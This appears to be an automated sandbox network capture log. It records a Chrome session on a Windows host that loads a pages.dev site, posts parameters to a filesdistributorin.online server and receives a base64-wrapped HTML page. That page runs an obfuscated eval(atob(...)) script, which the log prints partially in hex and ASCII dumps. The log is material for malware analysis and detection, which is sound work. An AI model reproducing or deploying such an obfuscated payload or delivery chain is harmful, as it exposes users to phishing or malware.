2024-08-31 22:54:38 UTC	13514	IN	Data Raw: 0d 74 d0 74 5a 2a 10 c9 ee a2 b6 97 a8 ec 64 5e 91 9d 0a 5f a7 25 1d 40 a8 25 c4 3a 93 14 f2 37 a3 7a 5d 81 56 ad a3 53 c2 0c c2 43 2e f5 10 43 f6 e2 18 82 a0 d5 c0 18 1a b1 71 ac 5b c6 a9 ec 21 28 b8 1d ca 46 29 ab 95 da ca e0 15 19 42 b0 86 96 c2 e2 0b b1 78 c3 44 1d f1 88 3b cc 22 3c 86 87 86 70 48 8a 0d 8b 68 11 71 8a 26 9e b3 c9 23 65 f2 59 1a 7e fe 3a e7 44 a0 0d a7 4b b8 a2 01 2b ee b1 35 ee 84 a9 3d 1d d1 80 c8 90 c6 32 4c 5c 64 37 09 d2 01 0e 4c 80 82 19 24 60 23 62 1b 19 c3 90 22 83 19 a0 c0 04 14 9a 61 cd 22 47 3c 11 0a 61 01 1d 40 c1 f9 1c a0 18 15 01 0e 4a d6 b8 8c 03 ce 87 82 0e b4 49 46 75 da a0 d8 2c d1 15 0d d8 60 02 e9 23 e5 1a 4c 13 48 f5 30 e8 0d ab 44 df 04 6c c0 13 17 c2 a8 28 84 0a 90 1b 64 10 03 f5 11 40 06 56 5c 8f 17 1b 91 00 fe Data Ascii: ttZ*d^_%@%:7z]VSC.Cq[!(F)BxD;"<pHhq&#eY~:DK+5=2L\d7L$`#b"a"G<a@JIFu,`#LH0Dl(d@V\

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49732	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:38 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-08-31 22:54:38 UTC	515	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=237062 Date: Sat, 31 Aug 2024 22:54:38 GMT Content-Length: 55 Connection: close X-CID: 2
2024-08-31 22:54:38 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49733	162.254.39.141	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:38 UTC	785	OUT	POST /ready-page.php HTTP/1.1 Host: basicplan.filesdistributorin.online Connection: keep-alive Content-Length: 86 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Accept: text/html, /; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:38 UTC	86	OUT	Data Raw: 63 36 39 72 31 35 33 3d 69 74 71 66 38 30 6e 26 38 6c 73 31 74 33 78 7a 3d 65 39 36 36 31 39 63 30 66 34 31 65 34 35 37 64 63 36 37 35 32 36 66 66 36 38 61 32 26 35 74 77 38 62 73 78 37 65 3d 38 37 64 63 32 32 38 37 38 65 30 31 39 33 39 37 63 36 34 39 62 38 Data Ascii: c69r153=itqf80n&8ls1t3xz=e96619c0f41e457dc67526ff68a2&5tw8bsx7e=87dc22878e019397c649b8
2024-08-31 22:54:39 UTC	283	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 x-powered-by: PHP/8.0.30 access-control-allow-origin: * content-type: text/html; charset=UTF-8 transfer-encoding: chunked date: Sat, 31 Aug 2024 22:54:39 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-08-31 22:54:39 UTC	16101	IN	Data Raw: 35 34 35 39 0d 0a 7b 22 74 22 3a 22 62 22 2c 22 64 22 3a 22 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 50 47 68 30 62 57 77 2b 50 47 68 6c 59 57 51 2b 50 47 31 6c 64 47 45 67 59 32 68 68 63 6e 4e 6c 64 44 30 69 56 56 52 47 4c 54 67 69 50 6a 77 76 61 47 56 68 5a 44 34 38 59 6d 39 6b 65 54 34 38 63 32 4e 79 61 58 42 30 50 6d 56 32 59 57 77 6f 59 58 52 76 59 69 67 69 5a 6b 70 52 54 6d 46 43 65 47 78 4e 62 57 35 6f 5a 6c 6c 33 65 57 39 6b 5a 46 70 51 52 45 78 57 5a 47 31 47 65 55 6c 48 53 6a 56 51 55 32 4e 75 54 45 64 33 4f 56 46 59 53 6e 6c 5a 57 47 74 76 54 57 70 42 4e 55 39 54 61 7a 64 69 52 6e 4e 34 54 6b 52 73 5a 46 42 54 53 6e 4e 69 62 55 6c 35 57 6b 56 77 55 6b 31 46 57 6e 56 56 4d 56 5a 50 55 57 78 76 64 32 4a 46 55 6c 4a 57 4d 6c 4a Data Ascii: 5459{"t":"b","d":"PCFET0NUWVBFIGh0bWw+PGh0bWw+PGhlYWQ+PG1ldGEgY2hhcnNldD0iVVRGLTgiPjwvaGVhZD48Ym9keT48c2NyaXB0PmV2YWwoYXRvYigiZkpRTmFCeGxNbW5oZll3eW9kZFpQRExWZG1GeUlHSjVQU2NuTEd3OVFYSnlZWGtvTWpBNU9TazdiRnN4TkRsZFBTSnNibUl5WkVwUk1FWnVVMVZPUWxvd2JFUlJWMlJ
2024-08-31 22:54:39 UTC	5500	IN	Data Raw: 30 6c 71 64 48 4e 58 65 6b 55 30 54 6d 70 47 5a 46 42 54 53 6b 4e 54 52 30 70 4a 56 57 31 47 62 46 5a 56 63 48 68 58 56 33 52 72 55 6a 4a 57 64 46 52 71 57 6b 35 53 4d 6e 68 77 56 6d 35 77 63 32 4e 47 62 46 64 61 52 46 4a 70 55 6d 78 4b 57 56 51 78 5a 44 42 5a 56 6c 56 33 59 6b 63 30 61 55 38 79 65 47 4a 4e 56 46 55 31 54 57 77 77 4f 55 6c 72 4d 48 6c 54 57 48 42 55 59 6c 68 53 55 6c 56 59 63 48 4e 6a 62 47 78 58 59 55 5a 77 54 45 31 46 4e 58 64 56 56 6d 52 72 55 32 78 46 64 31 4a 74 4e 56 52 57 56 54 56 44 56 32 70 43 63 31 4a 47 52 6c 68 61 52 58 42 53 54 55 4e 4a 4e 32 4a 47 63 33 68 4e 52 46 45 78 57 46 51 77 61 56 56 73 62 46 5a 68 61 30 70 77 56 46 64 77 56 31 4a 57 62 48 4a 61 53 45 35 6f 59 6c 56 5a 4d 56 56 58 63 48 4e 54 62 45 35 46 55 57 35 43 Data Ascii: 0lqdHNXekU0TmpGZFBTSkNTR0pJVW1GbFZVcHhXV3RrUjJWdFRqWk5SMnhwVm5wc2NGbFdaRFJpUmxKWVQxZDBZVlV3Ykc0aU8yeGJNVFU1TWwwOUlrMHlTWHBUYlhSUlVYcHNjbGxXYUZwTE1FNXdVVmRrU2xFd1JtNVRWVTVDV2pCc1JGRlhaRXBSTUNJN2JGc3hNRFExWFQwaVVsbFZha0pwVFdwV1JWbHJaSE5oYlVZMVVXcHNTbE5FUW5C
2024-08-31 22:54:39 UTC	16384	IN	Data Raw: 41 42 41 37 0d 0a 59 53 57 70 30 63 31 64 36 53 54 42 4f 52 6a 41 35 53 57 78 46 64 31 4a 74 4e 56 52 57 56 54 56 44 56 32 70 43 63 31 4a 47 52 6c 68 61 52 58 42 53 54 55 56 61 64 56 55 78 56 6b 39 52 62 47 39 33 59 6b 56 53 55 6c 59 79 55 6b 74 56 56 45 4a 48 59 6d 78 4f 56 6c 52 72 53 6d 46 4e 51 30 6b 33 59 6b 5a 7a 4d 55 39 55 56 6d 52 51 55 30 6c 34 56 44 46 4b 64 46 52 59 5a 45 39 54 52 32 68 77 56 6d 74 6b 4e 46 51 78 56 6e 4e 58 61 32 52 54 54 56 64 53 52 6c 5a 74 63 7a 56 56 4d 44 46 57 56 6c 68 73 56 30 31 47 57 6a 4e 5a 61 31 70 61 5a 57 31 46 65 6d 46 47 59 32 6c 50 4d 6e 68 69 54 56 52 5a 65 45 35 47 4d 44 6c 4a 62 47 74 35 54 55 68 6f 62 47 4a 49 51 54 46 56 4d 57 52 72 59 57 73 77 65 46 4e 55 52 6c 70 68 4d 6c 4a 58 56 44 46 57 63 32 52 47 Data Ascii: ABA7YSWp0c1d6STBORjA5SWxFd1JtNVRWVTVDV2pCc1JGRlhaRXBSTUVadVUxVk9RbG93YkVSUlYyUktVVEJHYmxOVlRrSmFNQ0k3YkZzMU9UVmRQU0l4VDFKdFRYZE9TR2hwVmtkNFQxVnNXa2RTTVdSRlZtczVVMDFWVlhsV01GWjNZa1paZW1FemFGY2lPMnhiTVRZeE5GMDlJbGt5TUhobGJIQTFVMWRrYWsweFNURlphMlJXVDFWc2RG
2024-08-31 22:54:39 UTC	16384	IN	Data Raw: 6c 5a 55 61 30 70 68 54 55 64 34 52 56 56 57 59 32 6c 50 4d 6e 68 69 54 56 52 6e 4d 6c 68 55 4d 47 6c 55 56 57 52 72 55 32 78 47 4e 6c 46 71 51 6c 5a 53 4d 6c 49 79 56 32 70 43 63 31 4a 47 52 6c 68 61 52 58 42 53 54 55 56 61 64 56 55 78 56 6b 39 52 62 47 39 33 59 6b 56 53 55 6c 59 79 55 6b 74 56 56 45 4a 48 59 6d 78 57 52 6b 6c 71 64 48 4e 58 65 6b 55 30 54 6b 52 4f 5a 46 42 54 53 58 68 5a 56 30 5a 49 55 32 74 73 56 57 4a 59 61 45 74 5a 56 33 42 54 56 45 5a 4f 56 6c 52 72 53 6d 46 4e 52 33 68 46 56 56 5a 6b 61 31 4e 73 52 58 64 53 62 54 56 55 56 6c 55 31 51 31 64 71 51 6e 4e 53 52 6b 5a 56 59 55 64 6e 61 55 38 79 65 47 4a 4e 56 45 30 31 57 46 51 77 61 55 31 57 53 6b 39 68 4d 6e 68 4b 56 56 63 78 62 32 46 72 4d 48 64 4f 53 48 42 61 59 57 73 31 54 46 6c 55 Data Ascii: lZUa0phTUd4RVVWY2lPMnhiTVRnMlhUMGlUVWRrU2xGNlFqQlZSMlIyV2pCc1JGRlhaRXBSTUVadVUxVk9RbG93YkVSUlYyUktVVEJHYmxWRklqdHNXekU0TkROZFBTSXhZV0ZIU2tsVWJYaEtZV3BTVEZOVlRrSmFNR3hFVVZka1NsRXdSbTVUVlU1Q1dqQnNSRkZVYUdnaU8yeGJNVE01WFQwaU1WSk9hMnhKVVcxb2FrMHdOSHBaYWs1TFlU
2024-08-31 22:54:39 UTC	11183	IN	Data Raw: 44 4e 57 4d 6e 42 4c 56 44 4a 53 52 31 5a 75 55 6b 35 57 61 30 70 77 56 6d 78 61 64 32 51 78 5a 46 68 6a 52 54 6c 58 54 55 52 47 53 46 56 58 65 46 4e 57 52 30 5a 79 56 32 35 4b 56 32 46 72 62 7a 42 5a 4d 6e 64 70 54 7a 4a 34 59 6b 31 55 52 54 46 4e 56 6a 41 35 53 57 74 77 55 31 5a 73 56 6d 46 52 4d 56 5a 58 56 6d 74 6b 55 6d 4a 46 57 6c 64 56 62 58 52 4c 56 57 78 61 56 6c 64 72 54 6c 5a 57 62 46 70 49 56 56 64 34 52 31 5a 73 53 6e 4a 54 62 45 70 58 56 6c 5a 77 52 46 5a 57 57 6c 64 53 65 55 6b 33 59 6b 5a 7a 65 45 31 55 61 33 6c 59 56 44 42 70 56 56 64 34 52 31 5a 73 53 6e 4a 54 62 45 70 58 56 6c 5a 77 52 46 5a 57 57 6c 64 53 4d 55 5a 7a 55 6d 78 61 55 32 45 77 63 46 4e 57 62 46 5a 68 55 54 46 57 56 31 5a 72 5a 46 4a 69 52 56 70 58 56 57 31 30 53 31 56 73 Data Ascii: DNWMnBLVDJSR1ZuUk5Wa0pwVmxad2QxZFhjRTlXTURGSFVXeFNWR0ZyV25KV2FrbzBZMndpTzJ4Yk1URTFNVjA5SWtwU1ZsVmFRMVZXVmtkUmJFWldVbXRLVWxaVldrTlZWbFpIVVd4R1ZsSnJTbEpXVlZwRFZWWldSeUk3YkZzeE1Ua3lYVDBpVVd4R1ZsSnJTbEpXVlZwRFZWWldSMUZzUmxaU2EwcFNWbFZhUTFWV1ZrZFJiRVpXVW10S1Vs
2024-08-31 22:54:39 UTC	16384	IN	Data Raw: 46 46 42 39 0d 0a 31 55 52 54 4a 4f 62 44 41 35 53 57 78 57 56 31 5a 72 5a 46 4a 69 52 56 70 58 56 57 31 30 53 31 56 73 57 6c 5a 58 61 30 35 57 56 6d 78 61 53 46 56 58 65 45 64 57 62 45 70 79 55 32 78 4b 56 31 5a 57 63 45 52 57 56 6c 70 58 55 6a 46 47 63 31 4a 73 57 6c 4e 68 65 55 6b 33 59 6b 5a 7a 4e 45 39 45 5a 47 52 51 55 30 70 33 56 55 5a 61 52 6b 35 59 53 6c 68 57 4d 30 4a 44 56 46 56 61 63 31 5a 57 57 6e 52 6c 52 54 6c 70 56 6d 78 5a 4d 46 59 79 4d 58 64 68 62 56 5a 79 54 31 5a 6f 56 57 4a 58 65 45 39 5a 56 33 68 79 5a 56 5a 6b 63 31 56 73 62 32 6c 50 4d 6e 68 69 54 30 52 5a 4d 46 68 55 4d 47 6c 61 56 33 4d 78 56 30 5a 4b 56 56 4e 72 4e 55 35 69 52 56 59 30 56 6b 5a 57 55 31 45 79 52 6b 5a 50 56 6c 5a 55 59 6c 64 6f 54 31 56 71 51 6e 4a 4e 52 6c 4a Data Ascii: FFB91URTJObDA5SWxWV1ZrZFJiRVpXVW10S1VsWlZXa05WVmxaSFVXeEdWbEpyU2xKV1ZWcERWVlpXUjFGc1JsWlNheUk3YkZzNE9EZGRQU0p3VUZaRk5YSlhWM0JDVFVac1ZWWnRlRTlpVmxZMFYyMXdhbVZyT1ZoVWJXeE9ZV3hyZVZkc1Vsb2lPMnhiT0RZMFhUMGlaV3MxV0ZKVVNrNU5iRVY0VkZWU1EyRkZPVlZUYldoT1VqQnJNRlJ
2024-08-31 22:54:39 UTC	16384	IN	Data Raw: 55 6d 30 31 57 46 5a 74 61 46 52 55 56 57 52 50 59 31 64 4a 65 56 70 48 65 47 78 57 56 56 6f 78 56 6a 46 61 62 31 4d 79 54 6b 64 69 52 6c 4a 4f 56 6e 6c 4a 4e 32 4a 47 63 7a 4e 4e 61 6b 35 6b 55 46 4e 4b 53 30 30 79 55 6b 68 57 61 32 78 56 56 30 5a 4b 54 31 6c 58 65 45 64 69 62 47 78 30 54 55 52 53 61 31 49 77 4e 55 6c 56 62 54 45 77 57 56 5a 4a 65 57 56 45 52 6c 68 69 62 58 51 30 57 58 70 47 64 31 64 47 5a 48 46 52 61 7a 42 70 54 7a 4a 34 59 6b 35 55 56 54 4e 59 56 44 42 70 57 6a 4e 73 55 32 46 72 57 6e 4a 56 61 6b 70 76 54 57 78 72 65 55 31 59 54 6b 39 69 53 45 4a 56 56 47 78 6f 64 32 46 74 53 6c 64 68 4d 31 70 61 54 57 70 47 57 46 70 58 4d 55 39 54 52 54 6c 5a 56 6d 31 77 54 6d 4a 47 63 48 52 4a 61 6e 52 7a 56 33 70 46 4e 55 31 71 54 6d 52 51 55 30 6f Data Ascii: Um01WFZtaFRUVWRPY1dJeVpHeGxWVVoxVjFab1MyTkdiRlJOVnlJN2JGczNNak5kUFNKS00yUkhWa2xVV0ZKT1lXeEdibGx0TURSa1IwNUlVbTEwWVZJeWVERlhibXQ0WXpGd1dGZHFRazBpTzJ4Yk5UVTNYVDBpWjNsU2FrWnJVakpvTWxreU1YTk9iSEJVVGxod2FtSldhM1paTWpGWFpXMU9TRTlZVm1wTmJGcHRJanRzV3pFNU1qTmRQU0o
2024-08-31 22:54:39 UTC	16384	IN	Data Raw: 53 57 74 61 64 56 55 78 56 6b 39 52 62 47 39 33 59 6b 56 53 55 6c 59 79 55 6b 74 56 56 45 4a 48 59 6d 78 4f 56 6c 52 72 53 6d 46 4e 52 33 68 46 56 56 5a 6b 61 31 4e 73 52 58 64 53 62 54 56 55 56 6c 55 31 51 31 64 71 51 6e 4e 53 51 30 6b 33 59 6b 5a 7a 65 45 31 36 54 54 42 59 56 44 42 70 56 6d 78 61 55 31 6c 57 62 46 68 54 62 46 70 59 59 6d 78 4b 56 6c 6c 72 5a 46 4e 55 52 6d 78 56 55 6d 35 6b 55 31 5a 73 63 46 70 57 56 33 68 33 59 56 5a 61 56 31 64 55 53 6c 64 4e 62 6c 4a 50 57 6b 52 4b 56 31 4a 72 4d 56 64 4a 61 6e 52 7a 56 33 70 6a 65 6b 30 78 4d 44 6c 4a 62 46 6b 78 56 56 5a 6a 4d 57 46 47 57 6a 5a 57 62 6e 42 61 56 6d 31 4e 65 46 6c 72 56 6a 52 58 52 6b 35 31 56 47 31 73 54 6d 46 36 56 6a 56 56 4d 6a 56 33 5a 47 78 76 65 56 4a 73 62 46 56 69 52 56 70 Data Ascii: SWtadVUxVk9RbG93YkVSUlYyUktVVEJHYmxOVlRrSmFNR3hFVVZka1NsRXdSbTVUVlU1Q1dqQnNSQ0k3YkZzeE16TTBYVDBpVmxaU1lWbFhTbFpYYmxKVllrZFNURmxVUm5kU1ZscFpWV3h3YVZaV1dUSldNblJPWkRKV1JrMVdJanRzV3pjek0xMDlJbFkxVVZjMWFGWjZWbnBaVm1NeFlrVjRXRk51VG1sTmF6VjVVMjV3ZGxveVJsbFViRVp
2024-08-31 22:54:39 UTC	16321	IN	Data Raw: 5a 57 35 4f 54 45 6c 71 64 48 4e 58 65 6b 56 33 54 58 70 43 5a 46 42 54 53 6c 70 68 4d 6c 4a 36 57 56 52 47 64 31 5a 46 4d 56 6c 52 62 57 78 6f 56 6b 56 5a 65 46 59 79 65 47 39 69 4d 44 46 47 59 6b 68 47 54 31 4a 59 55 6b 74 56 56 45 4a 48 59 6d 78 4f 56 6c 52 72 53 6d 46 4e 52 33 68 46 56 56 5a 6a 61 55 38 79 65 47 4a 4e 56 46 45 79 54 30 59 77 4f 55 6c 73 57 6c 6c 52 62 46 5a 59 59 57 73 31 52 46 5a 46 5a 46 64 58 56 6e 42 4a 59 6b 5a 4f 54 6d 4a 59 61 45 52 58 61 32 52 36 5a 55 55 31 56 6b 39 56 62 46 4e 68 65 6c 5a 76 56 6d 70 42 4d 55 35 47 56 6a 5a 55 62 6b 35 73 56 6c 4e 4a 4e 32 4a 47 63 33 70 4f 56 46 5a 6b 55 46 4e 4b 51 31 55 79 54 6b 64 69 52 6d 68 73 55 30 5a 77 61 46 70 58 4d 44 56 69 62 45 35 79 57 6b 52 53 61 32 4a 48 4f 54 56 5a 61 32 68 Data Ascii: ZW5OTElqdHNXekV3TXpCZFBTSlphMlJ6WVRGd1ZFMVlRbWxoVkVZeFYyeG9iMDFGYkhGT1JYUktVVEJHYmxOVlRrSmFNR3hFVVZjaU8yeGJNVFEyT0YwOUlsWllRbFZYYWs1RFZFZFdXVnBJYkZOTmJYaERXa2R6ZUU1Vk9VbFNhelZvVmpBMU5GVjZUbk5sVlNJN2JGc3pOVFZkUFNKQ1UyTkdiRmhsU0ZwaFpXMDVibE5yWkRSa2JHOTVZa2h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49734	172.66.47.41	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:39 UTC	825	OUT	GET /favicon.ico HTTP/1.1 Host: palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://palisades-observatory-3aea66138e00e57e9f-5677ed4549f19c25.pages.dev/890f5e421912d83086e5dcc2/86b1d9943b8c18420153e7/?c69r153=itqf80n&8ls1t3xz=e96619c0f41e457dc67526ff68a2&5tw8bsx7e=87dc22878e019397c649b8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:39 UTC	677	IN	HTTP/1.1 404 Not Found Date: Sat, 31 Aug 2024 22:54:39 GMT Content-Length: 0 Connection: close Access-Control-Allow-Origin: * Cache-Control: no-store referrer-policy: strict-origin-when-cross-origin Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QcBOsfsYs8PeYUCrKZ2Y9gYZGlIy2rfxNsPqrvrhLDPYQVwXL7h7QpSUTdFShD9ScIbhUZ%2B2yLOTDGIi2rnUall0A8LAMTfpMtaktOvzCYw0x0BvbR9TuUjPW1iBtEvb7H9nsVRO6RAlpW94Q8BS9VvltZt7k9U7r%2BDoFZ1QxvsNf9qAgTXs0y9rWXMDONa8WSAjQjpp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bc09a86cc6c425e-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49735	162.254.39.141	443	2732	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-31 22:54:39 UTC	390	OUT	GET /thegifloader/loading.gif HTTP/1.1 Host: theextrenalfiles.filesdistributorin.online Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-08-31 22:54:39 UTC	352	IN	HTTP/1.1 200 OK keep-alive: timeout=5, max=100 cache-control: public, max-age=604800 expires: Sat, 07 Sep 2024 22:54:39 GMT content-type: image/gif last-modified: Fri, 21 Jun 2024 11:56:27 GMT accept-ranges: bytes content-length: 68682 date: Sat, 31 Aug 2024 22:54:39 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-08-31 22:54:39 UTC	16032	IN	Data Raw: 47 49 46 38 39 61 64 00 64 00 d5 00 00 04 02 04 8c 8a 8c 44 42 44 c4 c6 c4 24 22 24 64 62 64 ac aa ac e4 e6 e4 14 12 14 9c 9a 9c 54 52 54 d4 d6 d4 34 32 34 74 72 74 bc ba bc f4 f6 f4 0c 0a 0c 94 92 94 4c 4a 4c cc ce cc 2c 2a 2c 6c 6a 6c b4 b2 b4 ec ee ec 1c 1a 1c a4 a2 a4 5c 5a 5c dc de dc 3c 3a 3c 7c 7a 7c c4 c2 c4 fc fe fc 04 06 04 8c 8e 8c 44 46 44 cc ca cc 24 26 24 64 66 64 ac ae ac ec ea ec 14 16 14 9c 9e 9c 54 56 54 dc da dc 34 36 34 74 76 74 bc be bc fc fa fc 0c 0e 0c 94 96 94 4c 4e 4c d4 d2 d4 2c 2e 2c 6c 6e 6c b4 b6 b4 f4 f2 f4 1c 1e 1c a4 a6 a4 5c 5e 5c e4 e2 e4 3c 3e 3c 7c 7e 7c ff ff ff 00 00 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 09 00 3e 00 2c 00 00 00 00 64 00 64 00 00 06 fe 40 9f ef 23 2c 1a 8b af e1 71 99 Data Ascii: GIF89addDBD$"$dbdTRT424trtLJL,*,ljl\Z\<:<\|z\|DFD$&$dfdTVT464tvtLNL,.,lnl\^\<><\|~\|!NETSCAPE2.0!>,dd@#,q
2024-08-31 22:54:39 UTC	5499	IN	Data Raw: 7c 75 80 0a 51 13 b4 e9 7e b6 6a 9c 60 56 46 c7 e3 e1 1d 97 25 ee fe d5 28 6d 33 b8 d2 59 1f 62 8b ac b2 4b 45 34 dc 82 47 ce 4b 83 7e e5 3d af c5 7a ab de 12 d5 76 99 71 c3 f3 d0 47 1f 3d cb 8d d2 5a e2 f5 da f0 23 6d 4e 74 8d 81 03 0b 20 40 00 02 0c e1 8f 5f 3e f9 10 30 40 4c e6 31 ff ee 0d a3 22 6f 5f c4 05 04 0c 6c 7f 56 04 c0 99 7d 39 97 1a 2c 67 a0 f7 b3 5f fe 0c d1 3f 7f dd e3 05 38 60 80 f8 16 58 3e 06 8a 4f 7d 86 92 c8 8d f6 20 41 f9 e5 c8 1e 4d b1 85 f4 36 f8 bc 3d fd 64 6d c4 01 57 cb 4a 67 93 c0 71 e9 6f 8e 33 51 31 e4 75 0f 63 4d 8b 85 ff 1a 57 b4 6c b7 3b 97 61 d0 50 8e ba 61 5f e8 a5 3d df a1 83 7d 06 ec 57 36 dc 86 06 b6 39 c5 13 83 b1 1b bc 8c 58 40 34 c1 90 68 f8 10 96 ff e0 95 3d d0 cd f0 87 e1 0a a2 bf 9c 96 2b 20 12 71 7f 54 6c 03 47 Data Ascii: \|uQ~j`VF%(m3YbKE4GK~=zvqG=Z#mNt @_>0@L1"o_lV}9,g_?8`X>O} AM6=dmWJgqo3Q1ucMWl;aPa_=}W69X@4h=+ qTlG
2024-08-31 22:54:39 UTC	16384	IN	Data Raw: 64 11 40 70 b2 10 b0 e0 03 36 80 62 f9 42 59 c7 46 ae b2 6d 47 40 d8 0d 3a e0 1b a9 f8 35 0e 23 98 c0 04 58 76 ab 92 62 74 52 32 3c 67 49 c1 c6 01 5f 2e 56 0c 0c 30 c1 07 3e 70 81 5f 86 d1 1c 50 8c 21 f3 ac 00 82 c9 7e 80 55 79 d2 a4 29 a3 68 ce 19 be 20 02 01 88 c0 02 94 89 85 cc 8e f2 12 82 db a2 a3 38 b0 80 00 4c f6 05 72 9a 87 17 46 20 01 09 b0 2c 79 5f 74 a4 3d 1a 48 49 06 3a 25 0e bf fa 40 04 3e 50 b5 ca c9 01 04 02 10 40 b6 d6 17 cc b9 26 d3 ac 9d 71 ed 1e 09 e0 d9 0b 64 cc 28 d1 95 6e d6 44 0b fe 94 18 a2 c3 8b 42 80 c1 64 51 db b0 95 0a a2 9d 02 d8 80 00 86 0b c6 0c 06 17 b8 e9 34 24 42 8d 10 59 cf 22 46 94 2a 88 2e 74 5d 3b 4a 7e 66 96 03 1b 50 6e 6a 0b 50 49 c1 84 b7 b9 af 43 2f e1 64 49 de 51 5c f2 08 cc fc 40 00 02 90 82 11 81 02 be 03 d6 d1 Data Ascii: d@p6bBYFmG@:5#XvbtR2<gI_.V0>p_P!~Uy)h 8LrF ,y_t=HI:%@>P@&qd(nDBdQ4$BY"F*.t];J~fPnjPIC/dIQ\@
2024-08-31 22:54:39 UTC	16384	IN	Data Raw: 86 20 91 42 02 14 f4 2c 40 c2 bc 94 b2 a8 4e 31 62 cd 02 5b 26 04 40 b2 42 15 62 f2 0a 85 75 56 01 83 00 14 c8 f0 eb 25 8b 12 ce 4c c4 4a 44 10 83 09 25 b4 5b 32 e2 d9 10 3c d4 3c 8a 56 78 98 32 89 e6 52 a7 1c 41 0b a4 79 a0 4d 9f 55 95 71 7a ad 03 3a b0 67 91 8d b8 78 03 bd 46 f6 63 7b d9 95 e4 fe 92 f8 91 be 4d 2f 63 43 72 a5 48 c3 59 62 79 7e b8 71 b1 47 65 82 e5 7e ca 7e 01 02 c8 44 ef 53 05 08 3b f2 e4 f5 6e cb 85 c1 4b 2b 17 f5 74 8a 96 fa 91 66 c1 e8 79 25 e6 5d 7f e1 f6 11 12 c5 fc de dd 86 87 bc 91 9f 18 d4 bd e9 02 15 ff 47 48 d6 44 bf 1a 6b c2 06 3f 21 8b f9 c3 e1 62 67 68 c1 5a 73 ae 17 0b 65 59 28 1b f0 b3 5e 01 f3 36 3d 3c d5 6f 6b eb 1b db 71 52 97 95 45 7c aa 6a c9 0b 08 fe 46 17 31 e2 01 e8 35 ec c3 8e 01 01 c8 b1 4e 74 01 06 28 4c a1 0a Data Ascii: B,@N1b[&@BbuV%LJD%[2<<Vx2RAyMUqz:gxFc{M/cCrHYby~qGe~~DS;nK+tfy%]GHDk?!bghZseY(^6=<okqRE\|jF15Nt(L
